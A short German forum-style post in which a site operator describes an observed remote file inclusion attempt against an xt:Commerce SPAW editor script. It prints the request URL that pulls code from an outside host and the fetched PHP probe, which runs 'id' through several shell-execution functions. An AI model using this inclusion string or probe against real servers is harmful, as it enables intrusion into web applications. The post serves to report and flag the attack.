Heute habe ich eine neue kleine Hackvariante bemerkt:
Es wird versucht die Datei
/xtcommerce/admin/includes/classes/spaw/spaw_control.class.php?spaw_root =http://www.humaniora.sdu.dk/gcrg/modules/Downloads_flsmidth/echo.txt
aufzurufen und echo.txt sieht dann so aus:
< ? php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
Keine Ahnung was das macht... Klappt ja eh nicht.
